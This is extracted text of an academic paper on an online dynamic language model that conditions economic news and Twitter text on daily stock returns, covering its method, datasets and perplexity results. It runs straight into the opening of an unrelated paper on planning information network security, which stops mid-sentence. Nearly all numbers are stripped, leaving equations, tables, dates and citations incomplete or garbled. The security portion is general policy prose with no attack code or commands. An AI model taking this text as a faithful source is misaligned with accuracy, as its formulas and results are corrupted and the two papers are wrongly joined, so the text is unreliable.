counts. we propose a general online learning algorithm for language modeling that draws inspiration from regret minimization in sequential predictions (cesa-bianchi and lugosi, ) and on- transactions of the association for computational linguistics, ( ) – . action editor: eric fosler-lussier. submitted / ; revised / ; published / . c© association for computational linguistics. line variational algorithms (sato, ; honkela and valpola, ). to our knowledge, our model is the first to bring together temporal dynamics, conditioning on non- linguistic context, and scalable online learning suit- able for streaming data and extensible to include topics and n-gram histories. the main idea of our model is independent of the choice of the base lan- guage model (e.g., unigrams, bigrams, topic models, etc.). in this paper, we focus on unigram and bi- gram language models in order to evaluate the basic idea on well understood models, and to show how it can be extended to higher-order n-grams. we leave extensions to topic models for future work. we propose a novel task to evaluate our proposed language model. the task is to predict economics- related text at a given time, taking into account the changes in stock prices up to the corresponding day. this can be seen an inverse of the setup considered by lavrenko et al. ( ), where news is assumed to influence stock prices. we evaluate our model on economics news in various languages (english, german, and french), as well as twitter data. background in this section, we first discuss the background for sequential predictions then describe how to formulate online language modeling as sequential predictions. . sequential predictions let w ,w , . . . ,wt be a sequence of response vari- ables, revealed one at a time. the goal is to design a good learner to predict the next response, given previous responses and additional evidence which we denote by xt ∈ rm (at time t). throughout this paper, we use the term features for x. specifically, at each round t, the learner receives xt and makes a pre- diction ŵt, by choosing a parameter vector αt ∈ rm . in this paper, we refer to α as feature coefficients. there has been an enormous amount of work on online learning for sequential predictions, much of it building on convex optimization. for a sequence of loss functions ` ,` , . . . ,`t (parameterized by α), an online learning algorithm is a strategy to minimize the regret, with respect to the best fixed α∗ in hind- sight. regret guarantees assume a lipschitz con- formally, the regret is defined as regrett (α ∗) = dition on the loss function ` that can be prohibitive for complex models. see cesa-bianchi and lugosi ( ), rakhlin ( ), bubeck ( ), and shalev- shwartz ( ) for in-depth discussion and review. there has also been work on online and stochastic learning for bayesian models (sato, ; honkela and valpola, ; hoffman et al., ), based on variational inference. the goal is to approximate pos- terior distributions of latent variables when examples arrive one at a time. in this paper, we will use both kinds of techniques to learn language models for streaming datasets. . problem formulation consider an online language modeling problem, in the spirit of sequential predictions. the task is to build a language model that accurately predicts the texts generated on day t, conditioned on observ- able features up to day t, x :t. every day, after the model makes a prediction, the actual texts wt are revealed and we suffer a loss. the loss is de- fined as the negative log likelihood of the model `t = − log p(wt | α,β :t− ,x :t− ,n :t− ), where α and β :t are the model parameters and n is a back- ground distribution (details are given in § . ). we can then update the model and proceed to day t + . notice the similarity to the sequential prediction de- scribed above. importantly, this is a realistic setup for building evolving language models from large-scale streaming datasets. model . notation we index timesteps by t ∈ { , . . . ,t} and word types by v ∈ { , . . . ,v}, both are always given as subscripts. we denote vectors in boldface and use : t as a shorthand for { , , . . . ,t}. we assume words of the form {wt}tt= for wt ∈ rv , which is the vector of word frequences at timetstep t. non- linguistic context features are {xt}tt= for xt ∈ rm . the goal is to learn parameters α and β :t , which will be described in detail next. . generative story the main idea of our model is illustrated by the fol- lowing generative story for the unigram languagept t= `t(xt,αt,wt)− infα∗ pt t= `t(xt,α ∗,wt). model. (we will discuss the extension to higher-order language models later.) a graphical representation of our proposed model is given in figure . . draw feature coefficients α ∼ n( ,λi). here α is a vector in rm , where m is the dimension- ality of the feature vector. . for each timestep t: (a) observe non-linguistic context features xt. (b) draw βt ∼ n (∑t− k= δk exp(α>f(xt,xk))pt− j= δj exp(α >f(xt,xj)) βk,ϕi ) . here, βt is a vector in r v , where v is the size of the word vocabulary, ϕ is the variance parameter and δk is a fixed hyperparameter; we discuss them below. (c) for each word wt,v, draw wt,v ∼ categorical ( exp(n :t− ,v+βt,v)p j∈v exp(n :t− ,j+βt,j) ) . in the last step, βt and n are mapped to the v - dimensional simplex, forming a distribution over words. n :t− ∈ rv is a background (log) distri- bution, inspired by a similar idea in eisenstein et al. ( ). in this paper, we set n :t− ,v to be the log- frequency of v up to time t− . we can interpret β as a time-dependent deviation from the background log-frequencies that incorporates world-context. this deviation comes in the form of a weighted average of earlier deviation vectors. the intuition behind the model is that the probabil- ity of a word appearing at day t depends on the back- ground log-frequencies, the deviation coefficients of the word at previous timesteps β :t− , and the sim- ilarity of current conditions of the world (based on observable features x) to previous timesteps through f(xt,xk). that is, f is a function that takes d- dimensional feature vectors at two timesteps xt and xk and returns a similarity vector f(xt,xk) ∈ rm (see § . . for an example of f that we use in our experiments). the similarity is parameterized by α, and decays over time with rate δk. in this work, we assume a fixed window size c (i.e., we consider c most recent timesteps), so that δ :t−c− = and δt−c:t− = . this allows up to cth order depen- dencies. setting δ this way allows us to bound the feature coefficients α can be also drawn from other distri- butions such as α ∼ laplace( ,λ). in online bayesian learning, it is known that forgetting inaccurate estimates from earlier timesteps is important (sato, � xtxsxrxq wq wr ws wt �t�s�r�q ↵ nrnq ns nt t figure : graphical representation of the model. the subscript indices q,r,s are shorthands for the previ- ous timesteps t − , t − , t − . only four timesteps are shown here. there are arrows from previous βt− ,βt− , . . . ,βt−c to βt, where c is the window size as described in § . . they are not shown here, for read- ability. number of past vectors β that need to be kept in memory. we set β to . although the generative story described above is for unigram language models, extensions can be made to more complex models (e.g., mixture of un- igrams, topic models, etc.) and to longer n-gram contexts. in the case of topic models, the model will be related to dynamic topic models (blei and lafferty, ) augmented by context features, and the learning procedure in § can be used to perform online learning of dynamic topic models. however, our model captures longer-range dependencies than dynamic topic models, and can condition on non- linguistic features or metadata. in the case of higher- order n-grams, one simple way is to draw more β, one for each history. for example, for a bigram model, β is in rv , rather than rv in the unigram model. we consider both unigram and bigram lan- guage models in our experiments in § . however, the main idea presented in this paper is largely indepen- dent of the base model. related work. mimno and mccallum ( ) and eisenstein et al. ( ) similarly conditioned text on ; honkela and valpola, ). since we set δ :t−c− = , at every timestep t, δk leads to forgetting older examples. observable features (e.g., author, publication venue, geography, and other document-level metadata), but conducted inference in a batch setting, thus their ap- proaches are not suitable for streaming data. it is not immediately clear how to generalize their approach to dynamic settings. algorithmically, our work comes closest to the online dynamic topic model of iwata et al. ( ), except that we also incorporate context features. learning and inference the goal of the learning procedure is to minimize the overall negative log likelihood, − log l(d) = − log ∫ dβ :tp(β :t | α,x :t )p(w :t | β :t ,n). however, this quantity is intractable. instead, we derive an upper bound for this quantity and minimize that upper bound. using jensen’s inequality, the vari- ational upper bound on the negative log likelihood is: − log l(d) ≤− ∫ dβ :tq(β :t | γ :t ) ( ) log p(β :t | α,x :t )p(w :t | β :t ,n) q(β :t | γ :t ) . specifically, we use mean-field variational inference where the variables in the variational distribution q are completely independent. we use gaussian distri- butions as our variational distributions for β, denoted by γ in the bound in eq. . we denote the parameters of the gaussian variational distribution for βt,v (word v at timestep t) by µt,v (mean) and σt,v (variance). figure shows the functional form of the varia- tional bound that we seek to minimize, denoted by b̂. the two main steps in the optimization of the bound are inferring βt and updating feature coefficients α. we next describe each step in detail. . learning the goal of the learning procedure is to minimize the upper bound in figure with respect to α. however, since the data arrives in an online fashion, and speed is very important for processing streaming datasets, the model needs to be updated at every timestep t (in our experiments, daily). notice that at timestep t, we only have access to x :t and w :t, and we perform learning at every timestep after the text for the current timestep wt is revealed. we do not know xt+ :t and wt+ :t . nonetheless, we want to update our model so that it can make a better prediction at t + . therefore, we can only minimize the bound until timestep t. let ck , exp(α >f(xt,xk))pt− j=t−c exp(α >f(xt,xj)) . our learning al- gorithm is a variational expectation-maximization algorithm (wainwright and jordan, ). e-step recall that we use variational inference and the variational parameters for β are µ and σ. as shown in figure , since the log-sum-exp in the last term of b is problematic, we introduce additional variational parameters ζ to simplify b and obtain b̂ (eqs. – ). the e-step deals with all the local variables µ, σ, and ζ. fixing other variables and taking the derivative of the bound b̂ w.r.t. ζt and setting it to zero, we obtain the closed-form update for ζt: ζt =∑ v∈v exp (n :t− ,v) exp ( µt,v + σt,v ) . to minimize with respect to µt and σt, we apply gradient-based methods since there are no closed- form solutions. the derivative w.r.t. µt,v is: ∂b̂ ∂µt,v = µt,v −ckµk,v ϕ −nt,v + nt ζt exp (n :t− ,v) exp ( µt,v + σt,v ) , where nt = ∑ v∈v nt,v. the derivative w.r.t. σt,v is: ∂b̂ ∂σt,v = σt,v + ϕ + nt ζt exp (n :t− ,v) exp ( µt,v + σt,v ) . although we require iterative methods in the e-step, we find it to be reasonably fast in practice. specifi- cally, we use the l-bfgs quasi-newton algorithm (liu and nocedal, ). we can further improve the bound by updating the variational parameters for timestep : t− , i.e., µ :t− and σ :t− , as well. however, this will require storing the texts from previous timesteps. addition- ally, this will complicate the m-step update described approximately . seconds/day (walltime) to learn the model on the en:na dataset on a . ghz cpu with gb memory. b =− t∑ t= eq[log p(βt | βk,α,xt)]− t∑ t= eq[log p(wt | βt,nt)]−h(q) ( ) = t∑ t=    ∑ j∈v log σt,j ϕ −eq  − ( βt − ∑t− k=t−c ckβk ) ϕ  −eq   ∑ v∈wt n :t− ,v + βt,v − log ∑ j∈v exp(n :t− ,j + βt,j)      ( ) ≤ t∑ t=    ∑ j∈v log σt,v ϕ + ( µt − ∑t− k=t−c ckµk ) ϕ + σt + ∑t− k=t−c c kσk ϕ − ∑ v∈wt  µt,v − log ζt − ζt ∑ j∈v exp (n :t− ,j) exp ( µt,j + σt,j )      + const ( ) figure : the variational bound that we seek to minimize, b. h(q) is the entropy of the variational distribution q. the derivation from line to line is done by replacing the probability distributions p(βt | βk,α,xt) and p(wt | βt,nt) by their respective functional forms. notice that in line we compute the expectations under the variational distributions and further bound b by introducing additional variational parameters ζ using jensen’s inequality on the log-sum-exp in the last term. we denote the new bound b̂. below. therefore, for each s < t, we choose to fix µs and σs once they are learned at timestep s. m-step in the m-step, we update the global pa- rameter α, fixing µ :t. fixing other parameters and taking the derivative of b̂ w.r.t. α, we obtain: ∂b̂ ∂α = (µt − ∑t− k=t−c ckµk)(− ∑t− k=t−c ∂ck ∂α ) ϕ + ∑t− k=t−c ckσk ∂ck ∂α ϕ , where: ∂ck ∂α =ckf(xt,xk) −ck ∑t− s=t−c f(xt,xs) exp(α >f(xt,xs))∑t− s=t−c exp(α >f(xt,xs)) . we follow the convex optimization strategy and sim- ply perform a stochastic gradient update: αt+ = αt + ηt ∂b̂ ∂αt (zinkevich, ). while the variational bound b̂ is not convex, given the local variables µ :t in our implementation, we augment α with a squared l regularization term (i.e., we assume that α is drawn from a normal distribution with mean zero and variance λ) and use the fobos algorithm (duchi and singer, ). the derivative of the regularization term is simple and is not shown here. of course, other regularizers (e.g., the l -norm, which we use for other parameters, or the l /∞-norm) can also be explored. and σ :t, optimizing α at timestep t without know- ing the future becomes a convex problem. since we do not reestimate µ :t− and σ :t− in the e-step, the choice to perform online gradient descent instead of iteratively performing batch optimization at every timestep is theoretically justified. notice that our overall learning procedure is still to minimize the variational upper bound b̂. all these choices are made to make the model suitable for learning in real time from large streaming datasets. preliminary experiments showed that performing more than one em iteration per day does not consid- erably improve performance, so in our experiments we perform one em iteration per day. to learn the parameters of the model, we rely on approximations and optimize an upper bound b̂. we have opted for this approach over alternatives (such as mcmc methods) because of our interest in the online, large-data setting. our experiments show that we are still able to learn reasonable parameter esti- mates by optimizing b̂. like online variational meth- ods for other latent-variable models such as lda (sato, ; hoffman et al., ), open questions re- main about the tightness of such approximations and the identifiability of model parameters. we note, how- as a result, our algorithm is hannan consistent w.r.t. the best fixed α (for b̂) in hindsight; i.e., the average regret goes to zero as t goes to ∞. ever, that our model does not include latent mixtures of topics and may be generally easier to estimate. prediction as described in § . , our model is evaluated by the loss suffered at every timestep, where the loss is defined as the negative log likelihood of the model on text at timestep wt. therefore, at each timestep t, we need to predict (the distribution of) wt. in order to do this, for each word v ∈ v , we simply compute the deviation means βt,v as weighted combinations of previous means, where the weights are determined by the world-context similarity encoded in x: eq[βt,v | µt,v] = t− ∑ k=t−c exp(α>f(xt,xk))∑t− j=t−c exp(α >f(xt,xj)) µk,v. recall that the word distribution that we use for prediction is obtained by applying the operator π that maps βt and n to the v -dimensional simplex, forming a distribution over words: π(βt,n :t− )v = exp(n :t− ,v+βt,v)p j∈v exp(n :t− ,j+βt,j) , where n :t− ,v ∈ rv is a background distribution (the log-frequency of word v observed up to time t− ). experiments in our experiments, we consider the problem of pre- dicting economy-related text appearing in news and microblogs, based on observable features that reflect current economic conditions in the world at a given time. in the following, we describe our dataset in de- tail, then show experimental results on text prediction. in all experiments, we set the window size c = (one week) or c = (two weeks), λ = |v | (v is the size of vocabulary of the dataset under consideration), and ϕ = . . dataset our data contains metadata and text corpora. the metadata is used as our features, whereas the text corpora are used for learning language models and predictions. the dataset (excluding twitter) can be downloaded at http://www.ark.cs.cmu. edu/dynamiclm. . . metadata we use end-of-day stock prices gathered from finance.yahoo.com for each stock included in the standard & poor’s index (s&p ). the index includes large (by market value) companies listed on us stock exchanges. we calculate daily (continuously compounded) returns for each stock, o: ro,t = log po,t−log po,t− , where po,t is the closing stock price. we make a simplifying assumption that text for day t is generated after po,t is observed. in general, stocks trade monday to friday (except for federal holidays and natural disasters). for days when stocks do not trade, we set ro,t = for all stocks since any price change is not observed. we transform returns into similarity values as fol- lows: f(xo,t,xo,k) = iff sign(ro,t) = sign(ro,k) and otherwise. while this limits the model by ig- noring the magnitude of price changes, it is still rea- sonable to capture the similarity between two days. there are stocks in the s&p , so xt ∈ r and f(xt,xk) ∈ r . . . text data we have five streams of text data. the first four corpora are news streams tracked through reuters. two of them are written in english, north american business report (en:na) and japanese investment news (en:jp). the remaining two are german eco- nomic news service (de, in german) and french economic news service (fr, in french). for all four of the reuters streams, we collected news data over a period of thirteen months ( days), - - to - - . see table for descriptive statistics of these datasets. numerical terms are mapped to a single word, and all letters are downcased. the last text stream comes from the deca- hose/gardenhose stream from twitter. we collected public tweets that contain ticker symbols (i.e., sym- bols that are used to denote stocks of a particular company in a stock market), preceded by the dollar for a list of companies listed in the s&p as of , see http://en.wikipedia.org/wiki/list_ of_s\% p_ _companies. this set was fixed during the time periods of all our experiments. we use the “adjusted close” on yahoo that includes interim dividend cash flows and also adjusts for “splits” (changes in the number of outstanding shares). this is done in order to avoid having to deal with hourly timesteps. in addition, intraday price data is only available through commercial data provided. note that daily stock returns are equally likely to be positive or negative and display little serial correlation. http://www.reuters.com dataset total # doc. avg. # doc. #days unigrams bigrams total # tokens size vocab. total # tokens size vocab. en:na , , , , , , , en:jp . , , , , , , fr , , , , , , , de , , , , , , , twitter , , , , , , table : statistics about the datasets. average number of documents (third column) is per day. sign $ (e.g., $goog, $msft, $aapl, etc.). these tags are generally used to indicate tweets about the stock market. we look at tweets from the period - - to - - ( days). as a result, we have approximately – tweets per day. we tokenized the tweets using the cmu ark tweetnlp tools, numerical terms are mapped to a single word, and all letters are downcased. we perform two experiments using unigram and bigram language models as the base models. for each dataset, we consider the top , unigrams after removing corpus-specific stopwords (the top words with highest frequencies). for the bigram experiments, we only use , words to limit the number of unique bigrams so that we can simulate experiments for the entire time horizon in a reason- able amount of time. in standard open-vocabulary language modeling experiments, the treatment of un- known words deserves care. we have opted for a controlled, closed-vocabulary experiment, since stan- dard smoothing techniques will almost surely interact with temporal dynamics and context in interesting ways that are out of scope in the present work. . baselines since this is a forecasting task, at each timestep, we only have access to data from previous timesteps. our model assumes that all words in all documents in a corpus come from a single multinomial distri- bution. therefore, we compare our approach to the corresponding base models (standard unigram and bi- gram language models) over the same vocabulary (for each stream). the first one maintains counts of every word and updates the counts at each timestep. this corresponds to a base model that uses all of the avail- able data up to the current timestep (“base all”). the second one replaces counts of every word with the https://www.ark.cs.cmu.edu/tweetnlp counts from the previous timestep (“base one”). ad- ditionally, we also compare with a base model whose counts decay exponentially (“base exp”). that is, the counts from previous timesteps decay by exp(−γs), where s is the distance between previous timesteps and the current timestep and γ is the decay constant. we set the decay constant γ = . we put a symmetric dirichlet prior on the counts (“add-one” smoothing); this is analogous to our treatment of the background frequencies n in our model. note that our model, similar to “base all,” uses all available data up to timestep t− when making predictions for timestep t. the window size c only determines which previ- ous timesteps’ models can be chosen for making a prediction today. the past models themselves are es- timated from all available data up to their respective timesteps. we also compare with two strong baselines: a lin- ear interpolation of “base one” models for the past week (“int. week”) and a linear interpolation of “base all” and “base one” (“int one all”). the interpolation weights are learned online using the normalized expo- nentiated gradient algorithm (kivinen and warmuth, ), which has been shown to enjoy a stronger regret guarantee compared to standard online gra- dient descent for learning a convex combination of weights. . results we evaluate the perplexity on unseen dataset to eval- uate the performance of our model. specifically, we use per-word predictive perplexity: perplexity = exp ( − ∑t t= log p(wt | α,x :t,n :t− )∑t t= ∑ j∈v wt,j ) . note that the denominator is the number of tokens up to timestep t . lower perplexity is better. table and table show the perplexity results for dataset base all base one base exp int. week int. one all c = c = en:na , , , , , , , en:jp , , , , , , , fr , , , , , , , de , , , , , , , twitter , , , , , , , table : perplexity results for our five data streams in the unigram experiments. the base models in “base all,” “base one,” and “base exp” are unigram language models. “int. week” is a linear interpolation of “base one” from the past week. “int. one all” is a linear interpolation of “base one” and “base all”. the rightmost two columns are versions of our model. best results are highlighted in bold. dataset base all base one base exp int. week int. one all c = en:na , , , en:jp , , , fr , , , de , , , twitter , , , , table : perplexity results for our five data streams in the bigram experiments. the base models in “base all,” “base one,” and “base exp” are bigram language models. “int. week” is a linear interpolation of “base one” from the past week. “int. one all” is a linear interpolation of “base one” and “base all”. the rightmost column is a version of our model with c = . best results are highlighted in bold. each of the datasets for unigram and bigram experi- ments respectively. our model outperformed other competing models in all cases but one. recall that we only define the similarity function of world context as: f(xo,t,xo,k) = iff sign(ro,t) = sign(ro,k) and otherwise. a better similarity function (e.g., one that takes into account market size of the company and the magnitude of increase or decrease in the stock price) might be able to improve the performance fur- ther. we leave this for future work. furthermore, the variations can be captured using models from the past week. we discuss why increasing c from to did not improve performance of the model in more detail in § . . we can also see how the models performed over time. figure traces perplexity for four reuters news stream datasets. we can see that in some cases the performance of the “base all” model degraded over time, whereas our model is more robust to temporal in both experiments, in order to manage the time and space complexities of updating β, we apply a sparsity shrinkage tech- nique by using owl-qn (andrew and gao, ) when maxi- mizing it, with regularization constant set to . intuitively, this is equivalent to encouraging the deviation vector to be sparse (eisenstein et al., ). shifts. in the bigram experiments, we only ran our model with c = , since we need to maintain β in rv , instead of rv in the unigram model. the goal of this experiment is to determine whether our method still adds benefit to more expressive language mod- els. note that the weights of the linear interpolation models are also learned in an online fashion since there are no classical training, development, and test sets in our setting. since the “base one” model per- formed poorly in this experiment, the performance of the interpolated models also suffered. for example, the “int. one all” model needed time to learn that the “base one” model has to be downweighted (we started with all interpolated models having uniform weights), so it was not able to outperform even the “base all” model. . analysis and discussion it should not be surprising that conditioning on world-context reduces perplexity (cover and thomas, ). a key attraction of our model, we believe, lies in the ability to inspect its parameters. deviation coefficients. inspecting the model al- lows us to gain insight into temporal trends. we twitter:google timestep β . . . . . googgoog @google@google google+google+ #goog#goog rgoogrgoog twitter:microsoft timestep β . . . . microsoftmicrosoft msftmsft #microsoft#microsoft rmsftrmsft figure : deviation coefficients β over time for google- and microsoft-related words on twitter with unigram base model (c = ). significant changes (increases or decreases) in the returns of google and microsoft stocks are usually followed by increases in β of related words. investigate the deviations learned by our model on the twitter dataset. examples are shown in figure . the left plot shows β for four words related to google: goog, #goog, @google, google+. for compari- son, we also show the return of google stock for the corresponding timestep (scaled by and centered at . for readability, smoothed using loess (cleveland, ), denoted by rgoog in the plot). we can see that significant changes of return of google stocks (e.g., the rgoog spikes between timesteps – , – , – in the plot) occurred alongside an increase in β of google-related words. similar trends can also be observed for microsoft-related words in the right plot. the most significant loss of return of microsoft stocks (the downward spike near timestep in the plot) is followed by a sudden sharp increase in β of the words #microsoft and microsoft. feature coefficients. we can also inspect the learned feature coefficients α to investigate which stocks have higher associations with the text that is generated. our feature coefficients are designed to reflect which changes (or lack of changes) in stock prices influence the word distribution more, not which stocks are talked about more often. we find that the feature coefficients do not correlate with obvious company characteristics like market capi- talization (firm size). for example, on the twitter dataset with bigram base models, the five stocks with the highest weights are: conagra foods inc., intel corp., bristol-myers squibb, frontier communica- tions corp., and amazon.com inc. strongly negative weights tended to align with streams with less activ- time lags fr eq ue nc y figure : distributions of the selection probabilities of models from the previous c = timesteps, on the en:na dataset with unigram base model. for simplicity, we show e-step modes. the histogram shows that the model tends to favor models from days closer to the current date. ity, suggesting that these were being used to smooth across all c days of history. a higher weight for stock o implies an increase in probability of choosing mod- els from previous timesteps s, when the state of the world for the current timestep t and timestep s is the same (as represented by our similarity function) with respect to stock o (all other things being equal), and a decrease in probability for a lower weight. selected models. besides feature coefficients, our model captures temporal shift by modeling similar- ity across the most recent c days. during inference, our model weights different word distributions from the past. the similarity is encoded in the pairwise features f(xt,xk) and the parameters α. figure shows the distributions of the strongest-posterior models from previous timesteps, based on how far en:na timestep pe rp le xi ty base allbase all completecomplete int. one allint. one all en:jp timestep pe rp le xi ty base allbase allcompletecomplete int. one allint. one all fr timestep pe rp le xi ty base allbase all completecomplete int. one allint. one all de timestep pe rp le xi ty base allbase all completecomplete int. one allint. one all figure : perplexity over time for four reuters news streams (c = ) with bigram base models. in the past they are at the time of use, aggregated across rounds on the en:na dataset, for window size c = . it shows that the model tends to favor models from days closer to the current date, with the t− models selected the most, perhaps because the state of the world today is more similar to dates closer to today compare to more distant dates. the plot also explains why increasing c from to did not im- prove performance of the model, since most of the variation in our datasets can be captured with models from the past week. topics. latent topic variables have often figured heavily in approaches to dynamic language model- ing. in preliminary experiments incorporating single- membership topic variables (i.e., each document be- longs to a single topic, as in a mixture of unigrams), we saw no benefit to perplexity. incorporating top- ics also increases computational cost, since we must maintain and estimate one language model per topic, per timestep. it is straightforward to design mod- els that incorporate topics with single- or mixed- membership as in lda (blei et al., ), an in- teresting future direction. potential applications. dynamic language models like ours can be potentially useful in many applica- tions, either as a standalone language model, e.g., predictive text input, whose performance may de- pend on the temporal dimension; or as a component in applications like machine translation or speech recognition. additionally, the model can be seen as a step towards enhancing text understanding with numerical, contextual data. conclusion we presented a dynamic language model for stream- ing datasets that allows conditioning on observable real-world context variables, exemplified in our ex- periments by stock market data. we showed how to perform learning and inference in an online fashion for this model. our experiments showed the predic- tive benefit of such conditioning and online learning by comparing to similar models that ignore temporal dimensions and observable variables that influence the text. acknowledgements the authors thank several anonymous reviewers for help- ful feedback on earlier drafts of this paper and brendan o’connor for help with collecting twitter data. this re- search was supported in part by google, by computing resources at the pittsburgh supercomputing center, by national science foundation grant iis- , afosr grant fa , onr grant n , and by the intelligence advanced research projects activ- ity via department of interior national business center contract number d pc . the u.s. government is authorized to reproduce and distribute reprints for govern- mental purposes notwithstanding any copyright annotation thereon. the views and conclusions contained herein are those of the authors and should not be interpreted as nec- essarily representing the official policies or endorsements, either expressed or implied, of iarpa, doi/nbc, or the u.s. government. references galen andrew and jianfeng gao. . scalable training of l -regularized log-linear models. in proc. of icml. david m. blei and john d. lafferty. . dynamic topic models. in proc. of icml. david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, : – . sébastien bubeck. . introduction to online opti- mization. technical report, department of operations research and financial engineering, princeton univer- sity. nicolò cesa-bianchi and gábor lugosi. . prediction, learning, and games. cambridge university press. william s. cleveland. . robust locally weighted regression and smoothing scatterplots. journal of the american statistical association, ( ): – . thomas m. cover and joy a. thomas. . elements of information theory. john wiley & sons. john duchi and yoram singer. . efficient online and batch learning using forward backward splitting. journal of machine learning research, ( ): – . jacob eisenstein, brendan o’connor, noah a. smith, and eric p. xing. . a latent variable model for geographic lexical variation. in proc. of emnlp. jacob eisenstein, amr ahmed, and eric p. xing. . sparse additive generative models of text. in proc. of icml. amit goyal, hal daume iii, and suresh venkatasubrama- nian. . streaming for large scale nlp: language modeling. in proc. of hlt-naacl. matt hoffman, david m. blei, chong wang, and john paisley. . stochastic variational inference. jour- nal of machine learning research, : – . antti honkela and harri valpola. . on-line varia- tional bayesian learning. in proc. of ica. tomoharu iwata, takeshi yamada, yasushi sakurai, and naonori ueda. . online multiscale dynamic topic models. in proc. of kdd. frederick jelinek. . statistical methods for speech recognition. mit press. jyrki kivinen and manfred k. warmuth. . expo- nentiated gradient versus gradient descent for linear predictors. information and computation, : – . victor lavrenko, matt schmill, dawn lawrie, paul ogilvie, david jensen, and james allan. . mining of concurrent text and time series. in proc. of kdd workshop on text mining. abby levenberg and miles osborne. . stream-based randomised language models for smt. in proc. of emnlp. abby levenberg, chris callison-burch, and miles os- borne. . stream-based translation models for sta- tistical machine translation. in proc. of hlt-naacl. dong c. liu and jorge nocedal. . on the limited memory bfgs method for large scale optimization. mathematical programming b, ( ): – . david mimno and andrew mccallum. . topic mod- els conditioned on arbitrary features with dirichlet- multinomial regression. in proc. of uai. alexander rakhlin. . lecture notes on online learn- ing. technical report, department of statistics, the wharton school, university of pennsylvania. masaaki sato. . online model selection based on the variational bayes. neural computation, ( ): – . shai shalev-shwartz. . online learning and online convex optimization. foundations and trends in ma- chine learning, ( ): – . martin j. wainwright and michael i. jordan. . graph- ical models, exponential families, and variational infer- ence. foundations and trends in machine learning, ( – ): – . chong wang, david m. blei, and david heckerman. . continuous time dynamic topic models. in proc. of uai. chong wang, john paisley, and david m. blei. . on- line variational inference for the hierarchical dirichlet process. in proc. of aistats. martin zinkevich. . online convex programming and generalized infinitesimal gradient ascent. in proc. of icml. the establishment and implementation of information network security plan wang yuanyuan ideological and political department xi’an peihua university xi’an, , china e-mail: @qq.com abstract—this paper explains the idea of information security and discusses the establishment of the security system of information network. by using the information system security engineering method, we will establish and improve the network security plan and disaster recovery plan through strict organization and management, adequate financial support, strong talent support and deep technical guarantee. this paper puts forward the overall strategic goal of the "people-oriented, to prevent the main" network security and the overall plan to solve the network security problems. keywords-information security; network security; network security plan information is the main trend of development in contemporary society. the rapid development of information has a great impact on all aspects of the state and society. the information network is the nervous system of the information society. as the main infrastructure of information communication, the security problem has become a new security research hotspot. at present, the threat control of network security has been extended from the technical level to the management level to a great extent. i. an overview of information network security a. the concept of information network security and the idea of information security information network security is a security protection to prevent accidents and malicious attacks from the confidentiality, integrity, availability, controllability and non-repudiation of information itself and information system (network structure, application services, etc.). information network security is based on the physical layer and operation level of information network system, as well as the protection of information itself (data layer) and the level of attack (content level). the definition of the definition of network security at the technical level has been relatively complete. but the security of information network is a multi-dimensional, multi factor and multi-objective system. the establishment of a security system cannot rely solely on a single security mechanism and a variety of security services. access to the security of the entire information network system depends on the combination of multiple security mechanisms and a variety of security services. the concept of information security, which was produced in s, is the result of this idea. the security system of information security is to ensure the security of information system through the combination of level and depth protection, active and passive defense. the basic components are shown in figure . figure . information security system components in the system of "human centered", the information security system not only attaches importance to the adoption nd international conference on sensor network and computer engineering (icsnce ) copyright © , the authors. published by atlantis press. this is an open access article under the cc by-nc license (http://creativecommons.org/licenses/by-nc/ . /). advances in computer science research, volume of safety protection technology to protect information, but also emphasizes "preventive measures". active defense strategy is adopted to improve the ability of intrusion detection, vulnerability scanning, virus prevention, evaluation and audit, and the ability of rapid response and recovery after attack. b. the necessity of the research on the security of information network and the establishment of the security system the development of information network technology has accelerated the process of social information. the development of information has opened up a broad space for the application of the information network system. however, because of the irrational decision making for the development of technology for many years, the dependence of the state and the society and the public on the information network has gradually increased. information network is realizing information exchange and sharing. while greatly facilitating and enriching social life, network security has become an important factor affecting national security and social stability due to the vulnerability of network itself and human attacks and destruction. therefore, the current government of the world has taken information security as the focus of government work. many laws and regulations related to information security have been issued. the international organization for standardization has also developed a large number of safety standards. the information security system in china is also under construction. according to the goal of information security system in china, the design and implementation of information network security is comprehensively considered from the perspective of personnel, technology, management, legislation and operation. we have put forward the international safety standards and national security law as a guide, the use of information system security engineering method, through rigorous management, adequate funding, strong talent support, strong technical guarantee, establish and improve the network security plan and disaster recovery plan. based on the principle of "people first", we should achieve the goal of achieving all levels of safety assurance from border security to host safety, and strive to reduce the security threat to an acceptable level and effectively control risks. in the event of an invasion and other disasters, a full range of security strategic objectives with powerful recovery and counterattack capabilities are achieved. ii. network security plan a. objectives of the security plan according to the relevant national laws and regulations, as well as the strategic objectives of the information network security system, the network security plan is formulated. the aim is to strengthen the security of network security and establish a relatively safe information network environment. through the effective implementation of the plan, the following four major goals are achieved: ) establish a solid technical basis. we should educate and train technical groups with strong network security capabilities, establish relevant organizations, identify and improve the responsibilities of security personnel, and defend, detect, respond and recover against possible infringed networks. ) detection and response. detection and monitoring of network status should be timely. when an attack is found, it can react quickly and control the attack, and quickly restore or rebuild the normal running state of the network. ) defense and recovery. establish an efficient network defense system. the protection of key infrastructure is free from network invasion and virus invasion. reduce network vulnerability. it has strong defense and recovery capabilities for network attacks that have occurred and may occur. ) the necessary ability to counterattack. the existing security defense capability may not be enough to achieve the desired security target for the aggressive attack. it is necessary to have the ability to fight back, to prevent or even destroy the invaders' attempt. b. the main contents of the network security plan the security of information network issystem engineering. it not only needs solid technical support, but also is restricted by many factors, such as staffing, organization construction, management level, national legislation and so on. therefore, it is necessary to formulate advances in computer science research, volume a feasible and efficient network security plan according to the objective of the all-round network security strategy. we should reasonably allocate all kinds of resources and coordinate the relations in all aspects. the plan mainly includes eight points: ) to establish an active defense system. identify key infrastructure and interdependence. the software and hardware of the network system, which is the carrier of information dissemination, storage and processing in the vulnerability information network system, is an important infrastructure in the whole system. the interdependence between these facilities, especially the key infrastructure, is given full attention. it also conducts continuous vulnerability assessment and audit of the software and hardware systems used in the network. the ability of the invaders to destroy the critical infrastructure is estimated. develop a practical scheme to repair the vulnerability of the system and constantly modify and update the scheme. the evaluation and audit work will effectively destroy the invaders' attempt, which is bound to be the target of the invaders to carry out the attack. therefore, enough attention should be given to the safety of the assessment and audit work itself. ) detection of attacks and illegal intrusion, and pay attention to the collection of network security information. acknowledgement and correction of vulnerability can delay but not completely prevent malicious intrusion to the information network system. therefore, we need to carry out active defense at all levels of information network system, install and configure intrusion detection system, vulnerability scanning system, emergency response system and so on. the network management department should always pay attention to the collection of network security information, help the end users to resist attacks and prevent virus invasion. establish security management organization according to the 